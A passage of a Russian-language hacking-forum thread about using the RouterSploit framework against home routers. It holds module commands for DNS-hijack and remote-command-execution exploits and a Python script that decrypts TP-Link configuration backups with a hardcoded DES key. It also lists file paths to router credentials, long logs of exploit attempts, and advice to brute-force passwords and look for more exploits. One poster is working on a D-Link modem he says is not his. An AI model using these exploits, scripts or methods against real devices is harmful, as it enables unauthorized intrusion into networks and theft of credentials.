RouterSploit

Обсуждение в разделе «Беспроводные технологии/Wi-Fi/Wardriving», начал(-а) Kevin Shindel, 16.08.2016.

  1. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Киньте линк на морду в личку, попытаюсь подробно изучить его.

    Я уже устал играться картинками пускай администраторы убирают костыли...
     
    Это одобряют Triton_Mgn и C-3PO.
  2. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Регистрация:
    21.07.2015
    Сообщения:
    530
    Одобрения:
    3 031
    Репутация:
    111
    Это ложное срабатывание. На оба запроса роутер ответил страницей с авторизацией.
     
    Это одобряют Triton_Mgn, binarymaster и C-3PO.
  3. egozalet

    egozalet New Member

    Регистрация:
    8.10.2016
    Сообщения:
    23
    Одобрения:
    3
    Репутация:
    0
    Скажите, а как пачу айпишников скормить?
     
  4. egozalet

    egozalet New Member

    Регистрация:
    8.10.2016
    Сообщения:
    23
    Одобрения:
    3
    Репутация:
    0
    Решился вопрос? У меня та же не заходит.
     
  5. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Окей гляну.
     
    Это одобряет mazik.
  6. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    RouterSploit пусто..
     
    Это одобряет mazik.
  7. Netway

    Netway New Member

    Регистрация:
    15.03.2017
    Сообщения:
    24
    Одобрения:
    3
    Репутация:
    0
    А что делать если такое говорит, забивать каждый из тех эксплойтов вручную? Роутер Тп-линк WDR740
    [​IMG]
     
  8. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Да. По очереди.
    use exploits/dlink/dsl_2740r_dns_change
    set target
    exploit
     
    Это одобряет Netway.
  9. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Отчасти...

    Натолкнул ФуйВуй из темы -

    Пробуем слить бэкап от ломаного\своего роутера.
    Дальше под линём пытаемся его дешифровать.
    Code:
    apt-get install python-crypto
    
    готовим скрипт
    Code:
    #!/usr/bin/python
    #
    from Crypto.Cipher import DES
    from hashlib import md5
    #
    key = '\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF'
    crypto = DES.new( key, DES.MODE_ECB )
    #
    data = open('config.bin', 'rb').read()
    data_decrypted = crypto.decrypt( data ).rstrip('\0')
    assert data_decrypted[:16] == md5(data_decrypted[16:]).digest()
    open('config.bin.txt', 'wb').write(data_decrypted[16:])
    
    Сохраняем скрипт и даём право на запуск.
    Кидаем бэкап в одну папку со скриптом.
    Запускаем скрипт.


    Источник - http://zftlab.org/pages/2014021700.html
    http://teknoraver.net/software/hacks/tplink/

    Пути к пасам:
    ОпенВРТ
    /etc/config/system - учетные данные от вебки
    /etc/shadow - учетные данные от телнет/ssh

    DD-WRT
    1. Скачиваем бэкап и открываем с помощью блокнота, все данные без шифрования в текстовом виде.
    2.Пути к файлам
     
    #29 Kevin Shindel, 23.04.2017
    В последний раз редактировалось: 25.04.2017
    Это одобряет Triton_Mgn.
  10. Scanner17

    Scanner17 New Member

    Регистрация:
    31.12.2017
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    Здравствуйте! Возникла необходимость восстановить утерянные логин и пароль доступа к веб-интерфейсу модема D-Link DSL-2750U. Сброс настроек рассматривается как крайний вариант. Попробовал RouterSploit 2.2.1. Установил ее единоразово (т.е. до первой перезагрузки) в среду Live USB Kali Linux 2017.3. Проверка на уязвимость ко всем эксплойтам командой use scanners/autopwn выдала некоторые положительные на первый взгляд результаты.
    Стал по очереди проверять все. Часть уязвимостей, как следует из их названия (dns change), прописывают DNS от Google в настройках модема, т.е. не рассчитаны на решение моей проблемы. Но для полноты картины попробовал запускать и эти 4 эксплойта. Лог у них получился абсолютно одинаковым.
    exploits/routers/shuttle/915wm_dns_change
    exploits/routers/dlink/dsl_2740r_dns_change
    exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
    exploits/routers/dlink/dsl_2640b_dns_change

    [*] Running module...
    [*] Attempting to change DNS settings...
    [*] Primary DNS: 8.8.8.8
    [*] Secondary DNS: 8.8.4.4
    [-] Could not change DNS settings
    Это означает, что роутер просто не подвержен этим уязвимостям?

    Все остальные эксплойты (или почти все) уже ориентированы на работу с авторизацией. Проверка работы каждого из них не дала положительных результатов. Прилагаю их логи запуска.
    rsf > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
    rsf (Netgear DGN2200 RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target address e.g. http://192.168.1.1
    port 80 Target Port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username admin Username
    password password Password


    rsf (Netgear DGN2200 RCE) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (Netgear DGN2200 RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target http://192.168.1.1 Target address e.g. http://192.168.1.1
    port 80 Target Port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username admin Username
    password password Password


    rsf (Netgear DGN2200 RCE) > run
    [*] Running module...
    [*] It is not possible to check if target is vulnerable
    [*] Trying to invoke command loop...
    [*] It is blind command injection. Response is not available.

    [+] Welcome to cmd. Commands are sent to the target via the execute method.
    [*] Depending on the vulnerability, command's results might not be available.
    [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

    cmd > exit
    rsf (Netgear DGN2200 RCE) > back
    rsf > use exploits/routers/dlink/dir_815_850l_rce
    rsf (D-Link DIR-815 & DIR-850L RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target IP address e.g. 192.168.1.1


    rsf (D-Link DIR-815 & DIR-850L RCE) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (D-Link DIR-815 & DIR-850L RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target 192.168.1.1 Target IP address e.g. 192.168.1.1


    rsf (D-Link DIR-815 & DIR-850L RCE) > run
    [*] Running module...
    [*] It's not possible to check if the target is vulnerable. Try to use following command loop.
    [*] Invoking command loop...
    [*] It is blind command injection, response is not available

    [+] Welcome to cmd. Commands are sent to the target via the execute method.
    [*] Depending on the vulnerability, command's results might not be available.
    [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

    cmd > exit
    rsf (D-Link DIR-815 & DIR-850L RCE) > back
    rsf > use exploits/routers/cisco/secure_acs_bypass
    rsf (Cisco Secure ACS Unauthorized Password Change) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target IP address
    port 443 Target Port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username Username to use
    path /PI/services/UCP/ Path to UCP WebService
    password Password to use


    rsf (Cisco Secure ACS Unauthorized Password Change) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (Cisco Secure ACS Unauthorized Password Change) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target http://192.168.1.1 Target IP address
    port 443 Target Port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username Username to use
    path /PI/services/UCP/ Path to UCP WebService
    password Password to use


    rsf (Cisco Secure ACS Unauthorized Password Change) > run
    [*] Running module...
    [*] Issuing password change request for:
    [-] Connection error: http://192.168.1.1:443/PI/services/UCP/
    [-] Exploit failed. Target seems to be not vulnerable.
    rsf (Cisco Secure ACS Unauthorized Password Change) > back

    P.S. Здесь, как я понял, скорее всего эксплойт просто не подходит для этого роутера.
    rsf > use exploits/routers/cisco/catalyst_2960_rocem
    rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target IP address


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    device -1 Target device - use "show devices"
    telnet_port 23 Target Port
    action set set / unset credless authentication for Telnet service


    rsf (Cisco Catalyst 2960 ROCEM RCE) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target 192.168.1.1 Target IP address


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    device -1 Target device - use "show devices"
    telnet_port 23 Target Port
    action set set / unset credless authentication for Telnet service


    rsf (Cisco Catalyst 2960 ROCEM RCE) > run
    [*] Running module...
    [-] Set target device - use "show devices" and "set device <id>"
    rsf (Cisco Catalyst 2960 ROCEM RCE) > back
    rsf > use exploits/routers/billion/5200w_rce
    rsf (Billion 5200W-T RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target address e.g. http://192.168.1.1
    port 80 Target port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username admin Default username to log in
    telnet_port 9999 Telnet port used for exploitation
    password password Default password to log in


    rsf (Billion 5200W-T RCE) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (Billion 5200W-T RCE) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target http://192.168.1.1 Target address e.g. http://192.168.1.1
    port 80 Target port


    Module options:

    Name Current settings Description
    ---- ---------------- -----------
    username admin Default username to log in
    telnet_port 9999 Telnet port used for exploitation
    password password Default password to log in


    rsf (Billion 5200W-T RCE) > run
    [*] Running module...
    [*] Trying to exploit first command injection vulnerability...
    [-] Exploitation failed for unauthenticated command injection
    [*] Trying authenticated commad injection vulnerability...
    [*] Trying exploitation with creds: admin:password
    [*] Trying exploitation with creds: true:true
    [*] Trying exploitation with creds: user3:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
    [*] Trying to connect to the telnet server...
    [-] Exploit failed - Telnet connection error: 192.168.1.1:9999
    rsf (Billion 5200W-T RCE) > back
    И последний лог от эксплойта, которому программа поставила положительный (не сомнительный) результат в плане уязвимости.
    rsf > use exploits/routers/3com/3cradsl72_info_disclosure
    rsf (3Com 3CRADSL72 Info Disclosure) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target Target address e.g. http://192.168.1.1
    port 80 Target port


    rsf (3Com 3CRADSL72 Info Disclosure) > set target 192.168.1.1
    [+] {'target': '192.168.1.1'}
    rsf (3Com 3CRADSL72 Info Disclosure) > show options

    Target options:

    Name Current settings Description
    ---- ---------------- -----------
    target http://192.168.1.1 Target address e.g. http://192.168.1.1
    port 80 Target port


    rsf (3Com 3CRADSL72 Info Disclosure) > run
    [*] Running module...
    [*] Sending request to download sensitive information
    [+] Exploit success
    [*] Reading /app_sta.stm file
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
    <title>DSL-2750U</title>
    <meta name="date" content="" />
    <meta name="generator" content="no generator" />
    <meta name="copyright" content="Copyright (C) 2011 D-Link Russia" />
    <meta name="keywords" content="DSL-2750U" />
    <meta name="description" content="DSL-2750U" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="content-style-type" content="text/css" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <link type="image/x-icon" rel="shortcut icon" href="/favicon.ico" />
    <link type="text/css" rel="stylesheet" href="dlink.css?id=1639683028" />
    <link type="text/css" rel="stylesheet" href="/css/login.css?id=1639683028" />
    <link type="text/css" rel="stylesheet" href="/css/common.css?id=1639683028" />
    <!--[if lt IE 8]>
    <link type="text/css" rel="stylesheet" href="/css/ie6.css?id=1639683028" />
    <![endif]-->
    <script type="text/javascript" src="/scripts/jquery.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/jquery.json.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/dlink.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/login.ui.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/jhmvc.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/device.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/sm_params.js?id=1639683028"></script>

    <script type="text/javascript" src="/scripts/common1.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/common2.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/login.js?id=1639683028"></script>
    <script type="text/javascript" src="/scripts/eng.lng.js?id=1639683028"></script>
    <script>var baselang = new Object(lang);</script>
    <script type="text/javascript" src="/scripts/rus.lng.js"></script>
    <script type="text/javascript" src="/scripts/config.lng.js?id=1639683028"></script>
    <script>
    var badAuthKey = "";
    window.curlang = "rus";
    window.encrypt_pass = "0";
    $(document).bind('ready', function(){
    setTimeout(function(){
    deleteCookie("salt");
    }, 4200000);
    start();
    });
    GLOBAL_VAR("rpcWAN")();
    if(window.ttnetRedirect) ttnetRedirect();
    if(window.httpIntercept) httpIntercept();
    </script>
    </head>
    <body>
    <div id='wrapperWorkspace'>
    <div id='workspace'>
    <div id='wrapperHeader'>
    <div id='miscBlocks' class='unselectable'>
    <div id='blockLogo'>
    <img src='/image/dlink_logo.gif' />
    </div>
    <div id='blockVersion'>
    <span id='v_model'></span> <span id='v_proxy'>DSL-2750U</span><br /><span id='v_firmware'></span>&nbsp; 2.0.17<br /><span id='v_lang'></span>
    </div>
    <div id='blockFastmenu'></div>
    <div class='clear'></div>
    </div>
    </div>
    <div id='wrapperContent'>
    <div id='errorMsg' class='unselectable' unselectable="on"></div>
    <div id='authWindow' class='window' style='box-shadow: 0 0 30px #555; -moz-box-shadow: 0 0 30px #555; -webkit-box-shadow: 0 0 30px #555;'>
    <div class='windowCaption unselectable'>
    <div class='windowTitle' unselectable="on"></div>
    <div class='windowPreloader' id='preloader'><img src='' /></div>
    <div class='clear'></div>
    </div>
    <div class='windowContent'>
    <form id="id_form_main" method="post" enctype="application/x-www-form-urlencoded" action="index.cgi">
    <input type="hidden" name="v2" value="y"/>
    <input type="hidden" name="rs_type" value="html"/>
    <input type="hidden" name="client_login" value=""/>
    <input type="hidden" name="client_password" value=""/>
    <input id="auth" name="auth" type="hidden" value="auth" />
    <div class='inputer spacer normal'>
    <div class='top unselectable'>
    <div class='title' unselectable="on"></div>
    <div class='caps' unselectable="on">[Caps Lock]</div>
    <div class='clear'></div>
    </div>
    <div class='bottom'>
    <div class='data'>
    <input type='text' id='A1' maxlength='31' />
    </div>
    <div class='clear'></div>
    </div>
    </div>
    <div class='inputer normal'>
    <div class='top unselectable'>
    <div class='title' unselectable="on"></div>
    <div class='caps' unselectable="on">[Caps Lock]</div>
    <div class='clear'></div>
    </div>
    <div class='bottom'>
    <div class='data'>
    <input type='password' id='A2' maxlength='31' />
    </div>
    <div class='clear'></div>
    </div>
    </div>
    </div>
    </form>
    <div class='windowAction unselectable'>
    <a href='#'>ВÑ
    од</a><a href='#'>Очистить</a>
    </div>
    </div>
    </div>
    </div>
    </div>
    </body>
    </html>

    [*] Sending request to download sensitive information
    [-] Exploit failed - could not retrieve response
    rsf (3Com 3CRADSL72 Info Disclosure) > back
    Как я понимаю, ни один из этих эксплойтов не подходит для этого роутера? Или есть возможность с помощью какого-либо из них вытащить логин и пароль? Заранее благодарю за ответы!
     
  11. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    1. Попробуйте сбрутить простеньким словарем.
    2. Найти в интернете эксплоиты на данную модель (например на сайте - exploit-db.com)
    3. Фреймворк metasploit также даёт возможность работы с роутерами посмотрите там.
     
    Это одобряет Scanner17.
  12. Scanner17

    Scanner17 New Member

    Регистрация:
    31.12.2017
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    Благодарю за помощь! По первому пункту: имеется ввиду подбор по стандартным и распространенным паролям?

    Про эксплойты говорили в соседней теме (Router Scan): выяснилось, что под мою модификацию этой модели - со встроенной антенной - нет эксплойтов. Много эксплойтов под более старый вариант - с внешней антенной. Один из таких эксплойтов (по всей видимости) проверял на своей модели - безуспешно:
    http://xiaopan.co/forums/downloads/d-link-dsl-2750u-authentication-bypass-vulnerability.378/
    http://www.routerpwn.com/D-Link/
    https://forum.antichat.ru/threads/proga-router-scan.398971/page-275#post-4168904

    Metasploit буду пробовать. Только пока не могу разобраться как его применить в моем случае, сложновато...
     
    #32 Scanner17, 11.01.2018
    В последний раз редактировалось: 11.01.2018
  13. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 666
    Одобрения:
    6 643
    Репутация:
    86
    Самое оптимальное решение вам уже подсказали:

    https://forum.antichat.ru/posts/4171642
     
    Это одобряет Scanner17.
  14. Scanner17

    Scanner17 New Member

    Регистрация:
    31.12.2017
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    Благодарю! Ответ я уже написал. Да, решение хорошее, но, с учетом того, что роутер не мой, я ограничусь попытками достать данные с помощью программ. Если ничего не получится, сделаю сброс настроек.

    Посмотрел в сети документацию по этой программе и возник вопрос: для проверки роутера подойдет вариант автоматического сканирования связкой nmap + db_autopwn? Или это неоптимальный вариант в данном случае? Заранее благодарю!
     
  15. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Ну во первых в текущих версиях этот модуль удалили, а во вторых это не оптимальное решение. Проще вручную найти.
     
    Это одобряет Scanner17.
  16. Scanner17

    Scanner17 New Member

    Регистрация:
    31.12.2017
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    Спасибо! Да, про удаление модуля читал, но видел информацию, что его можно вернуть вручную. Хотя в данном случае это, конечно, уже неактуально. Буду разбираться как делать ручной подбор эксплойтов.

    Я пробовал подбирать пароль через Router Scan (http) и X-Scan из пакета Intercepter-NG (http + telnet) с их встроенными словарями. Положительного результата добиться не удалось. Этого достаточно по первому пункту рекомендаций?
     
  17. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Думаю да.
     
    Это одобряет Scanner17.
  18. Scanner17

    Scanner17 New Member

    Регистрация:
    31.12.2017
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    Спасибо за ответ!